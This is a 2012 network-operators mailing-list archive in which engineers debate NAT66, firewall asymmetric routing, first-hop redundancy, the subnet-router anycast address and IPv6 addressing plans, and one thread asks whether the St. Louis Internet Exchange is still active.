scrubbed... Name: signature.asc Type: application/pgp-signature Size: 841 bytes Desc: Message signed with OpenPGP using GPGMail URL: From marka at isc.org Mon Jul 16 21:40:40 2012 From: marka at isc.org (Mark Andrews) Date: Tue, 17 Jul 2012 12:40:40 +1000 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: Your message of "Mon, 16 Jul 2012 21:55:40 -0400." References: Message-ID: <20120717024040.7A074228E3B4@drugs.dv.isc.org> In message , Lee writes: > On 7/16/12, Owen DeLong wrote: > > > > Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being > > able to eliminate NAT. NAT was a necessary evil for IPv4 address > > conservation. It has no good use in IPv6. > > NAT is good for getting the return traffic to the right firewall. How > else do you deal with multiple firewalls & asymmetric routing? Traffic goes where the routing protocols direct it. NAT doesn't help this and may actually hinder as the source address cannot be used internally to direct traffic to the correct egress point. Instead you need internal routers that have to try to track traffic flows rather than making simple decisions based on source and destination addresess. Applications that use multiple connections may not always end up with consistent external source addresses. > Yes, it's possible to get traffic back to the right place without NAT. > But is it as easy as just NATing the outbound traffic at the > firewall? It can be and it can be easier to debug without NAT mangling addresses. The only thing helpful NAT66 does is delay the externally visible source address selection until the packet passes the NAT66 box. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From shortdudey123 at gmail.com Mon Jul 16 21:56:29 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Mon, 16 Jul 2012 21:56:29 -0500 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: <20120717024040.7A074228E3B4@drugs.dv.isc.org> References: <20120717024040.7A074228E3B4@drugs.dv.isc.org> Message-ID: If you are running an HA pair, why would you care which box it went back through? -Grant On Monday, July 16, 2012, Mark Andrews wrote: > > In message squUmZofs3_-yriHY8o4Gt3W9+x6fVUQ at mail.gmail.com >, Lee > writes: > > On 7/16/12, Owen DeLong > wrote: > > > > > > Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is > being > > > able to eliminate NAT. NAT was a necessary evil for IPv4 address > > > conservation. It has no good use in IPv6. > > > > NAT is good for getting the return traffic to the right firewall. How > > else do you deal with multiple firewalls & asymmetric routing? > > Traffic goes where the routing protocols direct it. NAT doesn't > help this and may actually hinder as the source address cannot be > used internally to direct traffic to the correct egress point. > > Instead you need internal routers that have to try to track traffic > flows rather than making simple decisions based on source and > destination addresess. > > Applications that use multiple connections may not always end up > with consistent external source addresses. > > > Yes, it's possible to get traffic back to the right place without NAT. > > But is it as easy as just NATing the outbound traffic at the > > firewall? > > It can be and it can be easier to debug without NAT mangling > addresses. > > The only thing helpful NAT66 does is delay the externally visible > source address selection until the packet passes the NAT66 box. > > Mark > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > > From marka at isc.org Mon Jul 16 22:12:01 2012 From: marka at isc.org (Mark Andrews) Date: Tue, 17 Jul 2012 13:12:01 +1000 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: Your message of "Mon, 16 Jul 2012 21:56:29 EST." References: <20120717024040.7A074228E3B4@drugs.dv.isc.org> Message-ID: <20120717031201.BAE38228E945@drugs.dv.isc.org> In message , Grant Ridder writes: > > If you are running an HA pair, why would you care which box it went back > through? > > -Grant It still doesn't change the arguement. You still need to have flow based routers or you may choose the wrong egress point and if you need NAT66 you have 4+ upstream connections though two of them may be tunnels. You also need a protocol to keep the HA pair state tables in sync. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From matt.addison at lists.evilgeni.us Mon Jul 16 22:38:55 2012 From: matt.addison at lists.evilgeni.us (Matt Addison) Date: Mon, 16 Jul 2012 23:38:55 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <2059648.BTFFAkdkz4@lsdsrv> References: <2059648.BTFFAkdkz4@lsdsrv> Message-ID: <4742592599634568524@unknownmsgid> On Jul 16, 2012, at 15:40, Oliver wrote: > Additionally, as an alternative to RAs, you can simply point default at the > all-routers anycast address. Wouldn't this result in duplicate packets leaving your network if there were more than 1 router listening to 'all routers' and you (at the MAC layer) multicasted to those listeners? From virendra.rode at gmail.com Mon Jul 16 23:11:49 2012 From: virendra.rode at gmail.com (virendra rode) Date: Mon, 16 Jul 2012 21:11:49 -0700 Subject: St Louis Internet Exchange In-Reply-To: References: Message-ID: <5004E605.4060509@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Hi, On 07/16/2012 07:36 PM, Bill Woodcock wrote: > > On Jul 16, 2012, at 3:23 PM, Jay Hanke wrote: > >> After a bit of googling, I found some references to an Internet >> Exchange in St. Louis, MO called the St. Louis Regional >> Exchange. Is this project still active? > > It appears to be dead. The web site redirects to a commercial > colo, and the last few ISPs appear to have departed at the end of > 2008, after about two years of activity. > > https://prefix.pch.net/applications/ixpdir/detail.php?exchange_point_id=350 > > If anyone has any better information, please let us know. > > -Bill - -------------------- IXP DBs are coming out empty. I understand these DBs are best effort but what I like about PCH that it tends to never drop an exchange from the list and instead marks it as "defunct" or "down" by performing some sort of validation which Bill could confirm. In addition to IXP DBs, IRR, LGs & bgp tables (route view & ripe ris) shows no sign either. regards, /virendra -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iF4EAREIAAYFAlAE5gUACgkQ3HuimOHfh+FRbwD+NLNDFPc+ru2x3fIYJ0gDKuZU K77j6h8jxrJXwtOSduIA/i09nBAalPPK1fCii+z0swTE6Upj4dWqRA9osFTjwNN5 =iW4R -----END PGP SIGNATURE----- From owen at delong.com Mon Jul 16 23:11:18 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 21:11:18 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <2059648.BTFFAkdkz4@lsdsrv> References: <2059648.BTFFAkdkz4@lsdsrv> Message-ID: On Jul 16, 2012, at 12:39 PM, Oliver wrote: > On Monday 16 July 2012 18:26:08 Rajendra Chayapathi wrote: >> On the HSRP/ND part , this all falls in the First Hop redundancy areana >> and can be achieved via any of the following and each has its merits and >> cons.. >> >> 1) Using ND -- need to tune the "IPv6 nd reachable time" to achieve the >> faster failover >> 2) Using any of the First hop redundancy protocol ( HSRP, VRRP , GLBP) >> 3) Default route selection. >> > > In all honesty, I think using ND as the failover method is a generally bad > idea - you have no way of ensuring all endpoints take note of or honour the > router preference flag. Huh? Any host which doesn't is provably buggy. I'm not saying it can't or won't happen, but, seriously? If the host is that buggy, you can't count on it using the fake MAC either. > Additionally, having a 1 second validity lifetime is going to create a lot of > ICMPv6 spam across the segment - big deal? perhaps not. But when contrasted > with the fact that it can be wholly avoided using one of the aforementioned > redundancy protocols, why would you do it? You don't need a 1 second valid timer (that would be absurd). You need a 1 second keep alive (if you really care about 1 second fast fall-over) and you're going to get just as much SPAM with sub-second fallover from any of the other solutions as well. They all send multicast packets. > Additionally, as an alternative to RAs, you can simply point default at the > all-routers anycast address. The disadvantage to this is the high probability of packet duplication. For someone worried about ICMP spam on the subnet, I'm surprised you're not worried about what happens when 2 or more routers copy the same packet and route both copies on to the end destination. (Lather, rinse, repeat said duplication for any upstream segments using such tactics as well). Owen From mysidia at gmail.com Mon Jul 16 23:18:37 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Mon, 16 Jul 2012 23:18:37 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <50042F34.5080007@gmail.com> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> Message-ID: On 7/16/12, -Hammer- wrote: > hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If HSRP is a legacy proprietary protocol; try VRRP. Stateless autoconfig and router advertisements can obviate (eliminate/reduce) the need in many cases; albeit, with a longer failure recovery duration. > this morning from CheckPoint for NAT66. This should have been ready for > prime time years ago. I guess the vendors weren't getting the push from NAT66; you're talking about something that is not a mainline feature, an experimental proposition; RFC6296 produced in 2011. Very few IPv6 deployments should require prefix translation or any kind of NAT technology with IPv6, other than the IPv4 transition technologies. So... NO.. they should not have had this ready "for prime time" years ago. There are other things they should have been working on, such as getting the base IPv6 implementation correct, V6 connectivity, V6-enabled protocols, support for the newer RA/DHCPv6 options, and support for the newer more fully baked IPv4 transition specs such as 6to4, NAT-PT, and bugfixing. I'll take the stable platform, that has the standards-specified features, over one with bells and whistles, and the latest experimental draft features such as 6to6, that are not required to deploy IPv6, thanks. -- -JH From owen at delong.com Mon Jul 16 23:23:46 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 21:23:46 -0700 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: References: Message-ID: <4F2FCE9C-7014-4E95-90FC-3C3107999ED3@delong.com> On Jul 16, 2012, at 6:55 PM, Lee wrote: > On 7/16/12, Owen DeLong wrote: >> >> Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being >> able to eliminate NAT. NAT was a necessary evil for IPv4 address >> conservation. It has no good use in IPv6. > > NAT is good for getting the return traffic to the right firewall. How > else do you deal with multiple firewalls & asymmetric routing? 1. Share state across the firewalls or go with stateless firewalls. 2. Move the firewalls close enough to the end hosts to avoid this problem, Keep the asymmetric routing outside the perimeter. 3. Very creative source address selection mechanisms. 4. LISP (if you must). > > Yes, it's possible to get traffic back to the right place without NAT. > But is it as easy as just NATing the outbound traffic at the > firewall? That depends on whose life you are trying to make easy. If you asked the application developers or the people that have to build all the problematic ALGs that creates a need for, I'd bet they would have a different opinion than the guy configuring the firewall. In terms of overall problems created, cost to the community, increased insecurity, and the other costs associated with a NAT-based solution, I'd say that it is a net loss to use NAT and a net gain to avoid it. From the perspective of the firewall administrator alone without a broader view of the total consequences, toxic pollution of the internet seems like a good idea. Owen From owen at delong.com Mon Jul 16 23:28:18 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 21:28:18 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <1342492536.6281.149.camel@karl> References: <20120716035812.87659.qmail@joyce.lan> <1342492536.6281.149.camel@karl> Message-ID: On Jul 16, 2012, at 7:35 PM, Karl Auer wrote: > On Mon, 2012-07-16 at 22:04 -0400, Lee wrote: >> Each site gets a /48. Even the ones with less than 200 people. >> [...] >> Which is *boring*. Nothing novel, no breaking out of "IPv4 think" >> aside from massively wasting address space. > > It's only a waste if you get nothing for it. By using /64 everywhere you > get a more homogeneous network, easier to administer, manage, document, > maintain... There are similar advantages, writ larger, to using /48 for > every site. > It's also a waste if you don't ever use the address and the protocol gets deprecated before a significant percentage of the addresses are allocated. Earlier in this thread, I did the math showing how it will likely, even with very liberal allocation policies, be 100 years or more before we allocate 1/40th of the total IPv6 space to RIRs. > Whether you have 2, 20, 200, 2000 or 20,000 hosts in a /64 subnet, you > have still only used 0% of it, to a dozen or more decimal places. > IPv4-think says that's a waste. IPv6-think says "great - all my subnets > are large enough". Resizing IPv4 subnets is common; resizing IPv6 > subnets will be rare. > > IPv4-think is conserving addresses. IPv6-think is conserving subnets. We > don't buy dining chairs based on the number of atoms in them - we buy > enough to seat the people who need seating. > Exactly. Owen From owen at delong.com Mon Jul 16 23:26:00 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 21:26:00 -0700 Subject: using "reserved" IPv6 space In-Reply-To: References: <20120716035812.87659.qmail@joyce.lan> Message-ID: You could try this: If you give a /48 to each site, then assign the sites primary and backup firewalls. Aggregate the /48s into larger blocks by primary firewall. Aggregate the primary firewall bocks into larger backup firewall aggregates. Advertise the firewall-specific aggregates and the less specific backup-firewall set aggregates. Owen On Jul 16, 2012, at 7:04 PM, Lee wrote: > On 7/15/12, John Levine wrote: >>> I feel like I should be able to do something really nice with an >>> absurdly large address space. But lack of imagination or whatever.. I >>> haven't come up with anything that really appeals to me. >> >> Use a fresh IP for every HTTP request, email message, and IM. Just think of >> how well you can do error management. > > hrmm... nope, can't think of a single thing. Then again, I'm on the > routing & switching team at work, so things like HTTP requests, email > messages, and IM are just different types of user traffic that needs > to be routed to me. > > Recall the message I was responding to: > >>>> There is a HUGE difference between IPv4 and IPv6 thinking. We've all >>>> been living in an austerity regime for so long that we've completely >>>> forgotten how to leave parsimony behind. Even those of us who worked >>>> at companies that were summarily handed a Class B when we mumbled >>>> something about "internal subnetting" have a really hard time >>>> remembering how to act when we suddenly don't have to answer for every >>>> single host address and can design a network to conserve other things >>>> (like our brain cells). > > I read it as design a network >>addressing scheme<< to conserve other > things & was hoping someone could share new ways of looking at it. I > feel like I'm stuck in "IPv4 think" with an addressing plan that's > basically > > Each site gets a /48. Even the ones with less than 200 people. > Each subnet is assigned a /64 except for loopbacks & p2p subnets. > First 256 subnets in each /48 are reserved for things like loopback > addresses, p2p links, switch management subnets, etc. > High order 4 bits of the site address are used for the subnet type. > So a /52 tells you the site and if it's users, printers, servers, IP > phones, or whatever. > > Which is *boring*. Nothing novel, no breaking out of "IPv4 think" > aside from massively wasting address space. Which brings me back > around to my original request for suggestions. What's the new way of > looking at designing a network addressing scheme? > > Regards, > Lee From owen at delong.com Mon Jul 16 23:31:42 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 21:31:42 -0700 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: References: <20120717024040.7A074228E3B4@drugs.dv.isc.org> Message-ID: Think HA pairs in Pittsburgh, Dallas, and San Jose. Now imagine each has different upstream connectivity and the backbone network connecting all the corporate sites lives inside those firewalls. The real solution to this is to move the backbone outside of the firewalls and connect the internal networks via VPNS that ride the external backbone and can be routed over the internet safely when a backbone link fails. However, this still requires some interesting effort in terms of source address selection, routing, etc. in order to avoid triangle routing out of the firewall in Pittsburgh resulting in a return trying to come in via Dallas or San Jose. I think in IPv6, as firewall vendors begin ot mature their products, we'll either see a departure from stateful inspection, or, more likely an ability to set up HA clusters across diverse geography where state tables are kept in sync across the WAN. Owen On Jul 16, 2012, at 7:56 PM, Grant Ridder wrote: > If you are running an HA pair, why would you care which box it went back > through? > > -Grant > > On Monday, July 16, 2012, Mark Andrews wrote: > >> >> In message > squUmZofs3_-yriHY8o4Gt3W9+x6fVUQ at mail.gmail.com >, Lee >> writes: >>> On 7/16/12, Owen DeLong > wrote: >>>> >>>> Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is >> being >>>> able to eliminate NAT. NAT was a necessary evil for IPv4 address >>>> conservation. It has no good use in IPv6. >>> >>> NAT is good for getting the return traffic to the right firewall. How >>> else do you deal with multiple firewalls & asymmetric routing? >> >> Traffic goes where the routing protocols direct it. NAT doesn't >> help this and may actually hinder as the source address cannot be >> used internally to direct traffic to the correct egress point. >> >> Instead you need internal routers that have to try to track traffic >> flows rather than making simple decisions based on source and >> destination addresess. >> >> Applications that use multiple connections may not always end up >> with consistent external source addresses. >> >>> Yes, it's possible to get traffic back to the right place without NAT. >>> But is it as easy as just NATing the outbound traffic at the >>> firewall? >> >> It can be and it can be easier to debug without NAT mangling >> addresses. >> >> The only thing helpful NAT66 does is delay the externally visible >> source address selection until the packet passes the NAT66 box. >> >> Mark >> -- >> Mark Andrews, ISC >> 1 Seymour St., Dundas Valley, NSW 2117, Australia >> PHONE: +61 2 9871 4742 INTERNET: marka at isc.org >> >> From kauer at biplane.com.au Mon Jul 16 23:40:58 2012 From: kauer at biplane.com.au (Karl Auer) Date: Tue, 17 Jul 2012 14:40:58 +1000 Subject: using "reserved" IPv6 space In-Reply-To: <4742592599634568524@unknownmsgid> References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> Message-ID: <1342500058.6281.154.camel@karl> On Mon, 2012-07-16 at 23:38 -0400, Matt Addison wrote: > Oliver wrote: > > Additionally, as an alternative to RAs, you can simply point default > > at the all-routers anycast address. > > Wouldn't this result in duplicate packets leaving your network if > there were more than 1 router listening to 'all routers' and you (at > the MAC layer) multicasted to those listeners? I think Oliver meant the subnet router anycast address. Anycast gets you to one-of-many. The routers work out which of them is currently getting the subnet router anycast traffic. If that router drops out for any reason, another of the routers available on the link takes over. Regards, K. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Karl Auer (kauer at biplane.com.au) http://www.biplane.com.au/kauer GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017 Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part URL: From mysidia at gmail.com Tue Jul 17 00:10:50 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Tue, 17 Jul 2012 00:10:50 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <1342500058.6281.154.camel@karl> References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> Message-ID: On 7/16/12, Karl Auer wrote: > I think Oliver meant the subnet router anycast address. > Anycast gets you to one-of-many. The routers work out which of them is Just to reaffirm that. Rfc 4291 states packets sent to the subnet-router anycast will be delivered to one router on the subnet. That's fine for traffic with a destination IP of the anycast address; they'll land on one of the routers, and perhaps one of the routers will respond. But what about packets with a destination address on another network and trying to use the anycast address as a 'gateway'? The destination IP in the IP packet header of the forwarded packet won't be the anycast address; the last known hardware address for the IP, if it's unicast, may be down, so it's probably nonsensical to enter an anycast address as default gateway, unless using the subnet anycast address as a router/gateway has special behavior defined elsewhere? RFC 4291 S2.6.1 http://tools.ietf.org/html/rfc4291 " Packets sent to the Subnet-Router anycast address will be delivered to one router on the subnet. All routers are required to support the Subnet-Router anycast addresses for the subnets to which they have interfaces. " -- -JH From valdis.kletnieks at vt.edu Tue Jul 17 00:20:35 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 17 Jul 2012 01:20:35 -0400 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: Your message of "Mon, 16 Jul 2012 21:31:42 -0700." References: <20120717024040.7A074228E3B4@drugs.dv.isc.org> Message-ID: <97150.1342502435@turing-police.cc.vt.edu> On Mon, 16 Jul 2012 21:31:42 -0700, Owen DeLong said: > Think HA pairs in Pittsburgh, Dallas, and San Jose. > > Now imagine each has different upstream connectivity and the backbone > network connecting all the corporate sites lives inside those firewalls. > > The real solution to this is to move the backbone outside of the firewalls > and connect the internal networks via VPNS that ride the external backbone > and can be routed over the internet safely when a backbone link fails. Wouldn't this be even easier if you gave each machine involved multiple addresses, one ULA and one external? This isn't IPv4 anymore, you can stick multiple addresses on an interface. :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From kauer at biplane.com.au Tue Jul 17 00:29:06 2012 From: kauer at biplane.com.au (Karl Auer) Date: Tue, 17 Jul 2012 15:29:06 +1000 Subject: using "reserved" IPv6 space In-Reply-To: References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> Message-ID: <1342502946.6281.164.camel@karl> On Tue, 2012-07-17 at 00:10 -0500, Jimmy Hess wrote: > Just to reaffirm that. Rfc 4291 states packets sent to the > subnet-router anycast will be delivered to one router on the subnet. > [...] > But what about packets with a destination address on another network > and trying to use the anycast address as a 'gateway'? The > destination IP in the IP packet header of the forwarded packet won't > be the anycast address; the last known hardware address for the IP, > if it's unicast, may be down, so it's probably nonsensical to enter > an anycast address as default gateway, unless using the subnet > anycast address as a router/gateway has special behavior defined > elsewhere? I'm not sure I follow the logic there. If the anycast router changes the packet will be resent to the new subnet anycast router eventually (assuming some layer cares enough about the packet to resend it). The "last known hardware address" doesn't matter any more or less in this scenario than it does in any other routing situation. Regards, K. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Karl Auer (kauer at biplane.com.au) http://www.biplane.com.au/kauer GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017 Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part URL: From seth.mos at dds.nl Tue Jul 17 00:36:30 2012 From: seth.mos at dds.nl (Seth Mos) Date: Tue, 17 Jul 2012 07:36:30 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <161620.1342456488@turing-police.cc.vt.edu> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu> Message-ID: <75C9CAAC-9162-4F1F-9E51-A7801FC3F1C8@dds.nl> Hi, Op 16 jul 2012, om 18:34 heeft valdis.kletnieks at vt.edu het volgende geschreven: > On Mon, 16 Jul 2012 11:09:28 -0500, -Hammer- said: >> -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there >> if there weren't enough customers asking for it. Are all the customers naive? >> I doubt it. They have their reasons. I agree with your "purist" definition and >> did not say I was using it. My point is that vendors are still rolling out base >> line features even today. > > Sorry to tell you this, but the customers *are* naive and asking for stupid > stuff. They think they need NAT under IPv6 because they suffered with it in > IPv4 due to addressing issues or a (totally percieved) security benefit (said > benefit being *entirely* based on the fact that once you get NAT working, you > can build a stateful firewall for essentially free). The address crunch is > gone, and stateful firewalls exist, so there's no *real* reason to keep > pounding your head against the wall other than "we've been doing it for 15 > years". To highlight what the current NAT66 is useful for, it's a RFC for Network Prefix translation. It has nothing do with obfuscation or hiding the network anymore. It's current application is multihoming for the poor. Example: You have a Cable and a DSL, they both provide IPv6 and you want to provide failover. You then use ULA or one of the Global Addresses on the LAN network, and set up NAT66 mappings for the secondary WAN, or both if you are using ULA. This will not hide *anything* as your machines will now be *visible* on 2 global prefixes at the same time. And yes, you still use the stateful firewall rules on each WAN for the incoming traffic. And you can redirect traffic as needed out each WAN. It's the closest thing to the existing Dual WAN that current routers support. Also note that this also works fine with 2 IPv6 tunnels. Bind each tunnel to a WAN and you have the same failover for IPv6 as IPv4. Cheers, Seth From seth.mos at dds.nl Tue Jul 17 00:47:30 2012 From: seth.mos at dds.nl (Seth Mos) Date: Tue, 17 Jul 2012 07:47:30 +0200 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: References: <20120717024040.7A074228E3B4@drugs.dv.isc.org> Message-ID: Op 17 jul 2012, om 04:56 heeft Grant Ridder het volgende geschreven: > If you are running an HA pair, why would you care which box it went back > through? Because it could be/is a stateful firewall and the backup will drop the traffic. (FreeBSD CARP) Cheers, Seth > > -Grant > > On Monday, July 16, 2012, Mark Andrews wrote: > >> >> In message > squUmZofs3_-yriHY8o4Gt3W9+x6fVUQ at mail.gmail.com >, Lee >> writes: >>> On 7/16/12, Owen DeLong > wrote: >>>> >>>> Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is >> being >>>> able to eliminate NAT. NAT was a necessary evil for IPv4 address >>>> conservation. It has no good use in IPv6. >>> >>> NAT is good for getting the return traffic to the right firewall. How >>> else do you deal with multiple firewalls & asymmetric routing? >> >> Traffic goes where the routing protocols direct it. NAT doesn't >> help this and may actually hinder as the source address cannot be >> used internally to direct traffic to the correct egress point. >> >> Instead you need internal routers that have to try to track traffic >> flows rather than making simple decisions based on source and >> destination addresess. >> >> Applications that use multiple connections may not always end up >> with consistent external source addresses. >> >>> Yes, it's possible to get traffic back to the right place without NAT. >>> But is it as easy as just NATing the outbound traffic at the >>> firewall? >> >> It can be and it can be easier to debug without NAT mangling >> addresses. >> >> The only thing helpful NAT66 does is delay the externally visible >> source address selection until the packet passes the NAT66 box. >> >> Mark >> -- >> Mark Andrews, ISC >> 1 Seymour St., Dundas Valley, NSW 2117, Australia >> PHONE: +61 2 9871 4742 INTERNET: marka at isc.org >> >> From mysidia at gmail.com Tue Jul 17 01:16:32 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Tue, 17 Jul 2012 01:16:32 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <1342502946.6281.164.camel@karl> References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <1342502946.6281.164.camel@karl> Message-ID: On 7/17/12, Karl Auer wrote: [snip > I'm not sure I follow the logic there. If the anycast router changes the > packet will be resent to the new subnet anycast router eventually > (assuming some layer cares enough about the packet to resend it). The > "last known hardware address" doesn't matter any more or less in this > scenario than it does in any other routing situation. The pertinent discussion is not about "any other routing situation"; it's about first hop redundancy. The "last known hardware address" is in the NDP table, so the packet retransmissions likely wind up in the same place Another problem is the subnet anycast address may find unwanted routers that have to listen on it, including routers with only one interface and incomplete routing info, and including some unauthorized 5-port IPv6 router someone smuggled into the building and plugged in somewhere. By contrast, a real FHRP that implements failover either uses a virtual hardware address, or a 'gratuitous arp' type mechanism, so the packet retransmissions will go to the live failover partner. -- -JH From owen at delong.com Tue Jul 17 01:36:54 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 23:36:54 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <1342500058.6281.154.camel@karl> References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> Message-ID: <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com> On Jul 16, 2012, at 9:40 PM, Karl Auer wrote: > On Mon, 2012-07-16 at 23:38 -0400, Matt Addison wrote: >> Oliver wrote: >>> Additionally, as an alternative to RAs, you can simply point default >>> at the all-routers anycast address. >> >> Wouldn't this result in duplicate packets leaving your network if >> there were more than 1 router listening to 'all routers' and you (at >> the MAC layer) multicasted to those listeners? > > I think Oliver meant the subnet router anycast address. > > Anycast gets you to one-of-many. The routers work out which of them is > currently getting the subnet router anycast traffic. If that router > drops out for any reason, another of the routers available on the link > takes over. > Reread the spec... It gets the packet to one or more of the routers and it may well lead to packet duplication. There may or may not be coordination between the routers. It isn't in the spec. Owen From owen at delong.com Tue Jul 17 01:43:05 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 23:43:05 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <75C9CAAC-9162-4F1F-9E51-A7801FC3F1C8@dds.nl> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu> <75C9CAAC-9162-4F1F-9E51-A7801FC3F1C8@dds.nl> Message-ID: On Jul 16, 2012, at 10:36 PM, Seth Mos wrote: > Hi, > > Op 16 jul 2012, om 18:34 heeft valdis.kletnieks at vt.edu het volgende geschreven: > >> On Mon, 16 Jul 2012 11:09:28 -0500, -Hammer- said: >>> -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there >>> if there weren't enough customers asking for it. Are all the customers naive? >>> I doubt it. They have their reasons. I agree with your "purist" definition and >>> did not say I was using it. My point is that vendors are still rolling out base >>> line features even today. >> >> Sorry to tell you this, but the customers *are* naive and asking for stupid >> stuff. They think they need NAT under IPv6 because they suffered with it in >> IPv4 due to addressing issues or a (totally percieved) security benefit (said >> benefit being *entirely* based on the fact that once you get NAT working, you >> can build a stateful firewall for essentially free). The address crunch is >> gone, and stateful firewalls exist, so there's no *real* reason to keep >> pounding your head against the wall other than "we've been doing it for 15 >> years". > > To highlight what the current NAT66 is useful for, it's a RFC for Network Prefix translation. It has nothing do with obfuscation or hiding the network anymore. It's current application is multihoming for the poor. And it's a really poor way to do multihoming. You don't have to spend a lot of money to multihome properly. > > Example: > You have a Cable and a DSL, they both provide IPv6 and you want to provide failover. You then use ULA or one of the Global Addresses on the LAN network, and set up NAT66 mappings for the secondary WAN, or both if you are using ULA. I have that and I use BGP with an ARIN prefix using the Cable and DSL as layer 2 substrates for dual-stack tunnels. Works pretty well and doesn't cost much more than the NAT66 based solution. > This will not hide *anything* as your machines will now be *visible* on 2 global prefixes at the same time. And yes, you still use the stateful firewall rules on each WAN for the incoming traffic. And you can redirect traffic as needed out each WAN. It's the closest thing to the existing Dual WAN that current routers support. > > Also note that this also works fine with 2 IPv6 tunnels. Bind each tunnel to a WAN and you have the same failover for IPv6 as IPv4. Once you go to tunnels, why not go all the way and put BGP across the tunnels? Owen From owen at delong.com Tue Jul 17 01:40:11 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 23:40:11 -0700 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: <97150.1342502435@turing-police.cc.vt.edu> References: <20120717024040.7A074228E3B4@drugs.dv.isc.org> <97150.1342502435@turing-police.cc.vt.edu> Message-ID: <225F3135-ABBF-490B-8DA7-02E817D6BB23@delong.com> On Jul 16, 2012, at 10:20 PM, valdis.kletnieks at vt.edu wrote: > On Mon, 16 Jul 2012 21:31:42 -0700, Owen DeLong said: >> Think HA pairs in Pittsburgh, Dallas, and San Jose. >> >> Now imagine each has different upstream connectivity and the backbone >> network connecting all the corporate sites lives inside those firewalls. >> >> The real solution to this is to move the backbone outside of the firewalls >> and connect the internal networks via VPNS that ride the external backbone >> and can be routed over the internet safely when a backbone link fails. > > Wouldn't this be even easier if you gave each machine involved multiple > addresses, one ULA and one external? This isn't IPv4 anymore, you can > stick multiple addresses on an interface. :) Not really... Doesn't help with the situation where you go from host->Firewall A-> web server on the external internet and the response goes web server->Firewall B-> X 